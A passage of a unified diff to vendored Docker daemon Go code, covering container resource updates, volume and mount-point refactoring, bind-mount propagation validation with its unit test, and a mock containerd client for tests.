*container.HostConfig) (container.ContainerUpdateOKBody, error) { var warnings []string - warnings, err := daemon.verifyContainerSettings(hostConfig, nil, true) + c, err := daemon.GetContainer(name) if err != nil { return container.ContainerUpdateOKBody{Warnings: warnings}, err } + warnings, err = daemon.verifyContainerSettings(c.OS, hostConfig, nil, true) + if err != nil { + return container.ContainerUpdateOKBody{Warnings: warnings}, errdefs.InvalidParameter(err) + } + if err := daemon.update(name, hostConfig); err != nil { return container.ContainerUpdateOKBody{Warnings: warnings}, err } @@ -22,20 +30,6 @@ func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostCon return container.ContainerUpdateOKBody{Warnings: warnings}, nil } -// ContainerUpdateCmdOnBuild updates Path and Args for the container with ID cID. -func (daemon *Daemon) ContainerUpdateCmdOnBuild(cID string, cmd []string) error { - if len(cmd) == 0 { - return nil - } - c, err := daemon.GetContainer(cID) - if err != nil { - return err - } - c.Path = cmd[0] - c.Args = cmd[1:] - return nil -} - func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) error { if hostConfig == nil { return nil @@ -52,19 +46,27 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro if restoreConfig { container.Lock() container.HostConfig = &backupHostConfig - container.ToDisk() + container.CheckpointTo(daemon.containersReplica) container.Unlock() } }() if container.RemovalInProgress || container.Dead { - return errCannotUpdate(container.ID, fmt.Errorf("Container is marked for removal and cannot be \"update\".")) + return errCannotUpdate(container.ID, fmt.Errorf("container is marked for removal and cannot be \"update\"")) } + container.Lock() if err := container.UpdateContainer(hostConfig); err != nil { restoreConfig = true + container.Unlock() + return errCannotUpdate(container.ID, err) + } + if err := container.CheckpointTo(daemon.containersReplica); err 
!= nil { + restoreConfig = true + container.Unlock() return errCannotUpdate(container.ID, err) } + container.Unlock() // if Restart Policy changed, we need to update container monitor if hostConfig.RestartPolicy.Name != "" { @@ -76,9 +78,10 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro // If container is running (including paused), we need to update configs // to the real world. if container.IsRunning() && !container.IsRestarting() { - if err := daemon.containerd.UpdateResources(container.ID, toContainerdResources(hostConfig.Resources)); err != nil { + if err := daemon.containerd.UpdateResources(context.Background(), container.ID, toContainerdResources(hostConfig.Resources)); err != nil { restoreConfig = true - return errCannotUpdate(container.ID, err) + // TODO: it would be nice if containerd responded with better errors here so we can classify this better. + return errCannotUpdate(container.ID, errdefs.System(err)) } } @@ -88,5 +91,5 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro } func errCannotUpdate(containerID string, err error) error { - return fmt.Errorf("Cannot update container %s: %v", containerID, err) + return errors.Wrap(err, "Cannot update container "+containerID) } diff --git a/vendor/github.com/docker/docker/daemon/update_linux.go b/vendor/github.com/docker/docker/daemon/update_linux.go index f422325272..6a307eabc5 100644 --- a/vendor/github.com/docker/docker/daemon/update_linux.go +++ b/vendor/github.com/docker/docker/daemon/update_linux.go @@ -1,25 +1,54 @@ -// +build linux - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "time" + "github.com/docker/docker/api/types/container" "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runtime-spec/specs-go" ) -func toContainerdResources(resources container.Resources) libcontainerd.Resources { +func toContainerdResources(resources container.Resources) 
*libcontainerd.Resources { var r libcontainerd.Resources - r.BlkioWeight = uint64(resources.BlkioWeight) - r.CpuShares = uint64(resources.CPUShares) - r.CpuPeriod = uint64(resources.CPUPeriod) - r.CpuQuota = uint64(resources.CPUQuota) - r.CpusetCpus = resources.CpusetCpus - r.CpusetMems = resources.CpusetMems - r.MemoryLimit = uint64(resources.Memory) + + r.BlockIO = &specs.LinuxBlockIO{ + Weight: &resources.BlkioWeight, + } + + shares := uint64(resources.CPUShares) + r.CPU = &specs.LinuxCPU{ + Shares: &shares, + Cpus: resources.CpusetCpus, + Mems: resources.CpusetMems, + } + + var ( + period uint64 + quota int64 + ) + if resources.NanoCPUs != 0 { + period = uint64(100 * time.Millisecond / time.Microsecond) + quota = resources.NanoCPUs * int64(period) / 1e9 + } + if quota == 0 && resources.CPUQuota != 0 { + quota = resources.CPUQuota + } + if period == 0 && resources.CPUPeriod != 0 { + period = uint64(resources.CPUPeriod) + } + + r.CPU.Period = &period + r.CPU.Quota = "a + + r.Memory = &specs.LinuxMemory{ + Limit: &resources.Memory, + Reservation: &resources.MemoryReservation, + Kernel: &resources.KernelMemory, + } + if resources.MemorySwap > 0 { - r.MemorySwap = uint64(resources.MemorySwap) + r.Memory.Swap = &resources.MemorySwap } - r.MemoryReservation = uint64(resources.MemoryReservation) - r.KernelMemoryLimit = uint64(resources.KernelMemory) - return r + + return &r } diff --git a/vendor/github.com/docker/docker/daemon/update_solaris.go b/vendor/github.com/docker/docker/daemon/update_solaris.go deleted file mode 100644 index f3b545c5f0..0000000000 --- a/vendor/github.com/docker/docker/daemon/update_solaris.go +++ /dev/null @@ -1,11 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/libcontainerd" -) - -func toContainerdResources(resources container.Resources) libcontainerd.Resources { - var r libcontainerd.Resources - return r -} diff --git a/vendor/github.com/docker/docker/daemon/update_windows.go 
b/vendor/github.com/docker/docker/daemon/update_windows.go index 01466260bb..fada3c1c0b 100644 --- a/vendor/github.com/docker/docker/daemon/update_windows.go +++ b/vendor/github.com/docker/docker/daemon/update_windows.go @@ -1,13 +1,11 @@ -// +build windows - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types/container" "github.com/docker/docker/libcontainerd" ) -func toContainerdResources(resources container.Resources) libcontainerd.Resources { - var r libcontainerd.Resources - return r +func toContainerdResources(resources container.Resources) *libcontainerd.Resources { + // We don't support update, so do nothing + return nil } diff --git a/vendor/github.com/docker/docker/daemon/util_test.go b/vendor/github.com/docker/docker/daemon/util_test.go new file mode 100644 index 0000000000..b2c464f737 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/util_test.go @@ -0,0 +1,65 @@ +// +build linux + +package daemon + +import ( + "context" + "time" + + "github.com/containerd/containerd" + "github.com/docker/docker/libcontainerd" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// Mock containerd client implementation, for unit tests. 
+type MockContainerdClient struct { +} + +func (c *MockContainerdClient) Version(ctx context.Context) (containerd.Version, error) { + return containerd.Version{}, nil +} +func (c *MockContainerdClient) Restore(ctx context.Context, containerID string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error) { + return false, 0, nil +} +func (c *MockContainerdClient) Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error { + return nil +} +func (c *MockContainerdClient) Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error) { + return 0, nil +} +func (c *MockContainerdClient) SignalProcess(ctx context.Context, containerID, processID string, signal int) error { + return nil +} +func (c *MockContainerdClient) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio libcontainerd.StdioCallback) (int, error) { + return 0, nil +} +func (c *MockContainerdClient) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error { + return nil +} +func (c *MockContainerdClient) CloseStdin(ctx context.Context, containerID, processID string) error { + return nil +} +func (c *MockContainerdClient) Pause(ctx context.Context, containerID string) error { return nil } +func (c *MockContainerdClient) Resume(ctx context.Context, containerID string) error { return nil } +func (c *MockContainerdClient) Stats(ctx context.Context, containerID string) (*libcontainerd.Stats, error) { + return nil, nil +} +func (c *MockContainerdClient) ListPids(ctx context.Context, containerID string) ([]uint32, error) { + return nil, nil +} +func (c *MockContainerdClient) Summary(ctx context.Context, containerID string) ([]libcontainerd.Summary, error) { + return nil, nil +} +func (c *MockContainerdClient) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) { + 
return 0, time.Time{}, nil +} +func (c *MockContainerdClient) Delete(ctx context.Context, containerID string) error { return nil } +func (c *MockContainerdClient) Status(ctx context.Context, containerID string) (libcontainerd.Status, error) { + return "null", nil +} +func (c *MockContainerdClient) UpdateResources(ctx context.Context, containerID string, resources *libcontainerd.Resources) error { + return nil +} +func (c *MockContainerdClient) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/volumes.go b/vendor/github.com/docker/docker/daemon/volumes.go index 10cf787709..a20ff1fbf5 100644 --- a/vendor/github.com/docker/docker/daemon/volumes.go +++ b/vendor/github.com/docker/docker/daemon/volumes.go @@ -1,21 +1,25 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "errors" - "fmt" + "context" "os" "path/filepath" + "reflect" "strings" + "time" - "github.com/Sirupsen/logrus" - dockererrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" mounttypes "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" - "github.com/opencontainers/runc/libcontainer/label" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/docker/docker/volume/service" + volumeopts "github.com/docker/docker/volume/service/opts" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( @@ -26,21 +30,6 @@ var ( type mounts []container.Mount -// volumeToAPIType converts a volume.Volume to the type used by the Engine API -func volumeToAPIType(v volume.Volume) *types.Volume { - tv := &types.Volume{ - Name: v.Name(), - Driver: v.DriverName(), - } - if v, ok := 
v.(volume.DetailedVolume); ok { - tv.Labels = v.Labels() - tv.Options = v.Options() - tv.Scope = v.Scope() - } - - return tv -} - // Len returns the number of mounts. Used in sorting. func (m mounts) Len() int { return len(m) @@ -72,7 +61,10 @@ func (m mounts) parts(i int) int { // 4. Cleanup old volumes that are about to be reassigned. func (daemon *Daemon) registerMountPoints(container *container.Container, hostConfig *containertypes.HostConfig) (retErr error) { binds := map[string]bool{} - mountPoints := map[string]*volume.MountPoint{} + mountPoints := map[string]*volumemounts.MountPoint{} + parser := volumemounts.NewParser(container.OS) + + ctx := context.TODO() defer func() { // clean up the container mountpoints once return with error if retErr != nil { @@ -80,11 +72,20 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo if m.Volume == nil { continue } - daemon.volumes.Dereference(m.Volume, container.ID) + daemon.volumes.Release(ctx, m.Volume.Name(), container.ID) } } }() + dereferenceIfExists := func(destination string) { + if v, ok := mountPoints[destination]; ok { + logrus.Debugf("Duplicate mount point '%s'", destination) + if v.Volume != nil { + daemon.volumes.Release(ctx, v.Volume.Name(), container.ID) + } + } + } + // 1. Read already configured mount points. for destination, point := range container.MountPoints { mountPoints[destination] = point @@ -92,7 +93,7 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo // 2. Read volumes from other containers. 
for _, v := range hostConfig.VolumesFrom { - containerID, mode, err := volume.ParseVolumesFrom(v) + containerID, mode, err := parser.ParseVolumesFrom(v) if err != nil { return err } @@ -103,10 +104,11 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo } for _, m := range c.MountPoints { - cp := &volume.MountPoint{ + cp := &volumemounts.MountPoint{ + Type: m.Type, Name: m.Name, Source: m.Source, - RW: m.RW && volume.ReadWrite(mode), + RW: m.RW && parser.ReadWrite(mode), Driver: m.Driver, Destination: m.Destination, Propagation: m.Propagation, @@ -115,90 +117,106 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo } if len(cp.Source) == 0 { - v, err := daemon.volumes.GetWithRef(cp.Name, cp.Driver, container.ID) + v, err := daemon.volumes.Get(ctx, cp.Name, volumeopts.WithGetDriver(cp.Driver), volumeopts.WithGetReference(container.ID)) if err != nil { return err } - cp.Volume = v + cp.Volume = &volumeWrapper{v: v, s: daemon.volumes} } - + dereferenceIfExists(cp.Destination) mountPoints[cp.Destination] = cp } } // 3. 
Read bind mounts for _, b := range hostConfig.Binds { - bind, err := volume.ParseMountRaw(b, hostConfig.VolumeDriver) + bind, err := parser.ParseMountRaw(b, hostConfig.VolumeDriver) if err != nil { return err } + needsSlavePropagation, err := daemon.validateBindDaemonRoot(bind.Spec) + if err != nil { + return err + } + if needsSlavePropagation { + bind.Propagation = mount.PropagationRSlave + } // #10618 _, tmpfsExists := hostConfig.Tmpfs[bind.Destination] if binds[bind.Destination] || tmpfsExists { - return fmt.Errorf("Duplicate mount point '%s'", bind.Destination) + return duplicateMountPointError(bind.Destination) } if bind.Type == mounttypes.TypeVolume { // create the volume - v, err := daemon.volumes.CreateWithRef(bind.Name, bind.Driver, container.ID, nil, nil) + v, err := daemon.volumes.Create(ctx, bind.Name, bind.Driver, volumeopts.WithCreateReference(container.ID)) if err != nil { return err } - bind.Volume = v - bind.Source = v.Path() + bind.Volume = &volumeWrapper{v: v, s: daemon.volumes} + bind.Source = v.Mountpoint // bind.Name is an already existing volume, we need to use that here - bind.Driver = v.DriverName() + bind.Driver = v.Driver if bind.Driver == volume.DefaultDriverName { setBindModeIfNull(bind) } } binds[bind.Destination] = true + dereferenceIfExists(bind.Destination) mountPoints[bind.Destination] = bind } for _, cfg := range hostConfig.Mounts { - mp, err := volume.ParseMountSpec(cfg) + mp, err := parser.ParseMountSpec(cfg) if err != nil { - return dockererrors.NewBadRequestError(err) + return errdefs.InvalidParameter(err) + } + needsSlavePropagation, err := daemon.validateBindDaemonRoot(mp.Spec) + if err != nil { + return err + } + if needsSlavePropagation { + mp.Propagation = mount.PropagationRSlave } if binds[mp.Destination] { - return fmt.Errorf("Duplicate mount point '%s'", cfg.Target) + return duplicateMountPointError(cfg.Target) } if mp.Type == mounttypes.TypeVolume { - var v volume.Volume + var v *types.Volume if cfg.VolumeOptions != 
nil { var driverOpts map[string]string if cfg.VolumeOptions.DriverConfig != nil { driverOpts = cfg.VolumeOptions.DriverConfig.Options } - v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, driverOpts, cfg.VolumeOptions.Labels) + v, err = daemon.volumes.Create(ctx, + mp.Name, + mp.Driver, + volumeopts.WithCreateReference(container.ID), + volumeopts.WithCreateOptions(driverOpts), + volumeopts.WithCreateLabels(cfg.VolumeOptions.Labels), + ) } else { - v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, nil, nil) + v, err = daemon.volumes.Create(ctx, mp.Name, mp.Driver, volumeopts.WithCreateReference(container.ID)) } if err != nil { return err } - if err := label.Relabel(mp.Source, container.MountLabel, false); err != nil { - return err - } - mp.Volume = v - mp.Name = v.Name() - mp.Driver = v.DriverName() - - // only use the cached path here since getting the path is not necessary right now and calling `Path()` may be slow - if cv, ok := v.(interface { - CachedPath() string - }); ok { - mp.Source = cv.CachedPath() + mp.Volume = &volumeWrapper{v: v, s: daemon.volumes} + mp.Name = v.Name + mp.Driver = v.Driver + + if mp.Driver == volume.DefaultDriverName { + setBindModeIfNull(mp) } } binds[mp.Destination] = true + dereferenceIfExists(mp.Destination) mountPoints[mp.Destination] = mp } @@ -206,9 +224,9 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo // 4. Cleanup old volumes that are about to be reassigned. for _, m := range mountPoints { - if m.BackwardsCompatible() { + if parser.IsBackwardCompatible(m) { if mp, exists := container.MountPoints[m.Destination]; exists && mp.Volume != nil { - daemon.volumes.Dereference(mp.Volume, container.ID) + daemon.volumes.Release(ctx, mp.Volume.Name(), container.ID) } } } @@ -221,83 +239,179 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo // lazyInitializeVolume initializes a mountpoint's volume if needed. 
// This happens after a daemon restart. -func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volume.MountPoint) error { +func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volumemounts.MountPoint) error { if len(m.Driver) > 0 && m.Volume == nil { - v, err := daemon.volumes.GetWithRef(m.Name, m.Driver, containerID) + v, err := daemon.volumes.Get(context.TODO(), m.Name, volumeopts.WithGetDriver(m.Driver), volumeopts.WithGetReference(containerID)) if err != nil { return err } - m.Volume = v + m.Volume = &volumeWrapper{v: v, s: daemon.volumes} } return nil } -func backportMountSpec(container *container.Container) error { - for target, m := range container.MountPoints { - if m.Spec.Type != "" { - // if type is set on even one mount, no need to migrate - return nil +// backportMountSpec resolves mount specs (introduced in 1.13) from pre-1.13 +// mount configurations +// The container lock should not be held when calling this function. +// Changes are only made in-memory and may make changes to containers referenced +// by `container.HostConfig.VolumesFrom` +func (daemon *Daemon) backportMountSpec(container *container.Container) { + container.Lock() + defer container.Unlock() + + parser := volumemounts.NewParser(container.OS) + + maybeUpdate := make(map[string]bool) + for _, mp := range container.MountPoints { + if mp.Spec.Source != "" && mp.Type != "" { + continue + } + maybeUpdate[mp.Destination] = true + } + if len(maybeUpdate) == 0 { + return + } + + mountSpecs := make(map[string]bool, len(container.HostConfig.Mounts)) + for _, m := range container.HostConfig.Mounts { + mountSpecs[m.Target] = true + } + + binds := make(map[string]*volumemounts.MountPoint, len(container.HostConfig.Binds)) + for _, rawSpec := range container.HostConfig.Binds { + mp, err := parser.ParseMountRaw(rawSpec, container.HostConfig.VolumeDriver) + if err != nil { + logrus.WithError(err).Error("Got unexpected error while re-parsing raw volume spec during spec 
backport") + continue + } + binds[mp.Destination] = mp + } + + volumesFrom := make(map[string]volumemounts.MountPoint) + for _, fromSpec := range container.HostConfig.VolumesFrom { + from, _, err := parser.ParseVolumesFrom(fromSpec) + if err != nil { + logrus.WithError(err).WithField("id", container.ID).Error("Error reading volumes-from spec during mount spec backport") + continue + } + fromC, err := daemon.GetContainer(from) + if err != nil { + logrus.WithError(err).WithField("from-container", from).Error("Error looking up volumes-from container") + continue + } + + // make sure from container's specs have been backported + daemon.backportMountSpec(fromC) + + fromC.Lock() + for t, mp := range fromC.MountPoints { + volumesFrom[t] = *mp + } + fromC.Unlock() + } + + needsUpdate := func(containerMount, other *volumemounts.MountPoint) bool { + if containerMount.Type != other.Type || !reflect.DeepEqual(containerMount.Spec, other.Spec) { + return true + } + return false + } + + // main + for _, cm := range container.MountPoints { + if !maybeUpdate[cm.Destination] { + continue + } + // nothing to backport if from hostconfig.Mounts + if mountSpecs[cm.Destination] { + continue } - if m.Name != "" { - m.Type = mounttypes.TypeVolume - m.Spec.Type = mounttypes.TypeVolume - // make sure this is not an anyonmous volume before setting the spec source - if _, exists := container.Config.Volumes[target]; !exists { - m.Spec.Source = m.Name + if mp, exists := binds[cm.Destination]; exists { + if needsUpdate(cm, mp) { + cm.Spec = mp.Spec + cm.Type = mp.Type } - if container.HostConfig.VolumeDriver != "" { - m.Spec.VolumeOptions = &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{Name: container.HostConfig.VolumeDriver}, + continue + } + + if cm.Name != "" { + if mp, exists := volumesFrom[cm.Destination]; exists { + if needsUpdate(cm, &mp) { + cm.Spec = mp.Spec + cm.Type = mp.Type } + continue } - if strings.Contains(m.Mode, "nocopy") { - if m.Spec.VolumeOptions == nil { - 
m.Spec.VolumeOptions = &mounttypes.VolumeOptions{} - } - m.Spec.VolumeOptions.NoCopy = true + + if cm.Type != "" { + // probably specified via the hostconfig.Mounts + continue } + + // anon volume + cm.Type = mounttypes.TypeVolume + cm.Spec.Type = mounttypes.TypeVolume } else { - m.Type = mounttypes.TypeBind - m.Spec.Type = mounttypes.TypeBind - m.Spec.Source = m.Source - if m.Propagation != "" { - m.Spec.BindOptions = &mounttypes.BindOptions{ - Propagation: m.Propagation, + if cm.Type != "" { + // already updated + continue + } + + cm.Type = mounttypes.TypeBind + cm.Spec.Type = mounttypes.TypeBind + cm.Spec.Source = cm.Source + if cm.Propagation != "" { + cm.Spec.BindOptions = &mounttypes.BindOptions{ + Propagation: cm.Propagation, } } } - m.Spec.Target = m.Destination - if !m.RW { - m.Spec.ReadOnly = true - } + cm.Spec.Target = cm.Destination + cm.Spec.ReadOnly = !cm.RW } - return container.ToDiskLocking() } -func (daemon *Daemon) traverseLocalVolumes(fn func(volume.Volume) error) error { - localVolumeDriver, err := volumedrivers.GetDriver(volume.DefaultDriverName) - if err != nil { - return fmt.Errorf("can't retrieve local volume driver: %v", err) - } - vols, err := localVolumeDriver.List() - if err != nil { - return fmt.Errorf("can't retrieve local volumes: %v", err) - } +// VolumesService is used to perform volume operations +func (daemon *Daemon) VolumesService() *service.VolumesService { + return daemon.volumes +} - for _, v := range vols { - name := v.Name() - _, err := daemon.volumes.Get(name) - if err != nil { - logrus.Warnf("failed to retrieve volume %s from store: %v", name, err) - } +type volumeMounter interface { + Mount(ctx context.Context, v *types.Volume, ref string) (string, error) + Unmount(ctx context.Context, v *types.Volume, ref string) error +} - err = fn(v) - if err != nil { - return err - } - } +type volumeWrapper struct { + v *types.Volume + s volumeMounter +} - return nil +func (v *volumeWrapper) Name() string { + return v.v.Name +} + 
+func (v *volumeWrapper) DriverName() string { + return v.v.Driver +} + +func (v *volumeWrapper) Path() string { + return v.v.Mountpoint +} + +func (v *volumeWrapper) Mount(ref string) (string, error) { + return v.s.Mount(context.TODO(), v.v, ref) +} + +func (v *volumeWrapper) Unmount(ref string) error { + return v.s.Unmount(context.TODO(), v.v, ref) +} + +func (v *volumeWrapper) CreatedAt() (time.Time, error) { + return time.Time{}, errors.New("not implemented") +} + +func (v *volumeWrapper) Status() map[string]interface{} { + return v.v.Status } diff --git a/vendor/github.com/docker/docker/daemon/volumes_linux.go b/vendor/github.com/docker/docker/daemon/volumes_linux.go new file mode 100644 index 0000000000..cf3d9ed159 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_linux.go @@ -0,0 +1,36 @@ +package daemon + +import ( + "strings" + + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" +) + +// validateBindDaemonRoot ensures that if a given mountpoint's source is within +// the daemon root path, that the propagation is set up to prevent a container +// from holding private references to a mount within the daemon root, which +// can cause issues when the daemon attempts to remove the mountpoint. 
+func (daemon *Daemon) validateBindDaemonRoot(m mount.Mount) (bool, error) { + if m.Type != mount.TypeBind { + return false, nil + } + + // check if the source is within the daemon root, or if the daemon root is within the source + if !strings.HasPrefix(m.Source, daemon.root) && !strings.HasPrefix(daemon.root, m.Source) { + return false, nil + } + + if m.BindOptions == nil { + return true, nil + } + + switch m.BindOptions.Propagation { + case mount.PropagationRSlave, mount.PropagationRShared, "": + return m.BindOptions.Propagation == "", nil + default: + } + + return false, errdefs.InvalidParameter(errors.Errorf(`invalid mount config: must use either propagation mode "rslave" or "rshared" when mount source is within the daemon root, daemon root: %q, bind mount source: %q, propagation: %q`, daemon.root, m.Source, m.BindOptions.Propagation)) +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_linux_test.go b/vendor/github.com/docker/docker/daemon/volumes_linux_test.go new file mode 100644 index 0000000000..72830c3e81 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_linux_test.go @@ -0,0 +1,56 @@ +package daemon + +import ( + "path/filepath" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestBindDaemonRoot(t *testing.T) { + t.Parallel() + d := &Daemon{root: "/a/b/c/daemon"} + for _, test := range []struct { + desc string + opts *mount.BindOptions + needsProp bool + err bool + }{ + {desc: "nil propagation settings", opts: nil, needsProp: true, err: false}, + {desc: "empty propagation settings", opts: &mount.BindOptions{}, needsProp: true, err: false}, + {desc: "private propagation", opts: &mount.BindOptions{Propagation: mount.PropagationPrivate}, err: true}, + {desc: "rprivate propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRPrivate}, err: true}, + {desc: "slave propagation", opts: &mount.BindOptions{Propagation: mount.PropagationSlave}, err: true}, + {desc: "rslave propagation", opts: 
&mount.BindOptions{Propagation: mount.PropagationRSlave}, err: false, needsProp: false}, + {desc: "shared propagation", opts: &mount.BindOptions{Propagation: mount.PropagationShared}, err: true}, + {desc: "rshared propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRShared}, err: false, needsProp: false}, + } { + t.Run(test.desc, func(t *testing.T) { + test := test + for desc, source := range map[string]string{ + "source is root": d.root, + "source is subpath": filepath.Join(d.root, "a", "b"), + "source is parent": filepath.Dir(d.root), + "source is /": "/", + } { + t.Run(desc, func(t *testing.T) { + mount := mount.Mount{ + Type: mount.TypeBind, + Source: source, + BindOptions: test.opts, + } + needsProp, err := d.validateBindDaemonRoot(mount) + if (err != nil) != test.err { + t.Fatalf("expected err=%v, got: %v", test.err, err) + } + if test.err { + return + } + if test.needsProp != needsProp { + t.Fatalf("expected needsProp=%v, got: %v", test.needsProp, needsProp) + } + }) + } + }) + } +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go index 450d17f978..6bdebe467c 100644 --- a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go +++ b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go @@ -1,9 +1,10 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "runtime" "testing" - "github.com/docker/docker/volume" + volumemounts "github.com/docker/docker/volume/mounts" ) func TestParseVolumesFrom(t *testing.T) { @@ -20,8 +21,10 @@ func TestParseVolumesFrom(t *testing.T) { {"foobar:baz", "", "", true}, } + parser := volumemounts.NewParser(runtime.GOOS) + for _, c := range cases { - id, mode, err := volume.ParseVolumesFrom(c.spec) + id, mode, err := parser.ParseVolumesFrom(c.spec) if c.fail { if err == nil { t.Fatalf("Expected error, was nil, for spec %s\n", c.spec) diff --git 
a/vendor/github.com/docker/docker/daemon/volumes_unix.go b/vendor/github.com/docker/docker/daemon/volumes_unix.go index 29dffa9ea0..efffefa76b 100644 --- a/vendor/github.com/docker/docker/daemon/volumes_unix.go +++ b/vendor/github.com/docker/docker/daemon/volumes_unix.go @@ -1,13 +1,10 @@ // +build !windows -// TODO(amitkris): We need to split this file for solaris. - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "encoding/json" + "fmt" "os" - "path/filepath" "sort" "strconv" "strings" @@ -15,10 +12,7 @@ import ( "github.com/docker/docker/container" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/pkg/errors" + volumemounts "github.com/docker/docker/volume/mounts" ) // setupMounts iterates through each of the mount points for a container and @@ -42,8 +36,18 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er if err := daemon.lazyInitializeVolume(c.ID, m); err != nil { return nil, err } - rootUID, rootGID := daemon.GetRemappedUIDGID() - path, err := m.Setup(c.MountLabel, rootUID, rootGID) + // If the daemon is being shut down, we should not let a container start if it is trying to + // mount the socket the daemon is listening on. During daemon shutdown, the socket + // (/var/run/docker.sock by default) doesn't exist anymore, causing the call to m.Setup to + // create a directory instead. This in turn will prevent the daemon from restarting. 
+ checkfunc := func(m *volumemounts.MountPoint) error { + if _, exist := daemon.hosts[m.Source]; exist && daemon.IsShuttingDown() { + return fmt.Errorf("Could not mount %q to container while the daemon is shutting down", m.Source) + } + return nil + } + + path, err := m.Setup(c.MountLabel, daemon.idMappings.RootPair(), checkfunc) if err != nil { return nil, err } @@ -73,10 +77,15 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er // if we are going to mount any of the network files from container // metadata, the ownership must be set properly for potential container // remapped root (user namespaces) - rootUID, rootGID := daemon.GetRemappedUIDGID() + rootIDs := daemon.idMappings.RootPair() for _, mount := range netMounts { - if err := os.Chown(mount.Source, rootUID, rootGID); err != nil { - return nil, err + // we should only modify ownership of network files within our own container + // metadata repository. If the user specifies a mount path external, it is + // up to the user to make sure the file has proper ownership for userns + if strings.Index(mount.Source, daemon.repository) == 0 { + if err := os.Chown(mount.Source, rootIDs.UID, rootIDs.GID); err != nil { + return nil, err + } } } return append(mounts, netMounts...), nil @@ -93,84 +102,12 @@ func sortMounts(m []container.Mount) []container.Mount { // setBindModeIfNull is platform specific processing to ensure the // shared mode is set to 'z' if it is null. This is called in the case // of processing a named volume and not a typical bind. -func setBindModeIfNull(bind *volume.MountPoint) { +func setBindModeIfNull(bind *volumemounts.MountPoint) { if bind.Mode == "" { bind.Mode = "z" } } -// migrateVolume links the contents of a volume created pre Docker 1.7 -// into the location expected by the local driver. -// It creates a symlink from DOCKER_ROOT/vfs/dir/VOLUME_ID to DOCKER_ROOT/volumes/VOLUME_ID/_container_data. 
-// It preserves the volume json configuration generated pre Docker 1.7 to be able to -// downgrade from Docker 1.7 to Docker 1.6 without losing volume compatibility. -func migrateVolume(id, vfs string) error { - l, err := volumedrivers.GetDriver(volume.DefaultDriverName) - if err != nil { - return err - } - - newDataPath := l.(*local.Root).DataPath(id) - fi, err := os.Stat(newDataPath) - if err != nil && !os.IsNotExist(err) { - return err - } - - if fi != nil && fi.IsDir() { - return nil - } - - return os.Symlink(vfs, newDataPath) -} - -// verifyVolumesInfo ports volumes configured for the containers pre docker 1.7. -// It reads the container configuration and creates valid mount points for the old volumes. -func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { - // Inspect old structures only when we're upgrading from old versions - // to versions >= 1.7 and the MountPoints has not been populated with volumes data. - type volumes struct { - Volumes map[string]string - VolumesRW map[string]bool - } - cfgPath, err := container.ConfigPath() - if err != nil { - return err - } - f, err := os.Open(cfgPath) - if err != nil { - return errors.Wrap(err, "could not open container config") - } - defer f.Close() - var cv volumes - if err := json.NewDecoder(f).Decode(&cv); err != nil { - return errors.Wrap(err, "could not decode container config") - } - - if len(container.MountPoints) == 0 && len(cv.Volumes) > 0 { - for destination, hostPath := range cv.Volumes { - vfsPath := filepath.Join(daemon.root, "vfs", "dir") - rw := cv.VolumesRW != nil && cv.VolumesRW[destination] - - if strings.HasPrefix(hostPath, vfsPath) { - id := 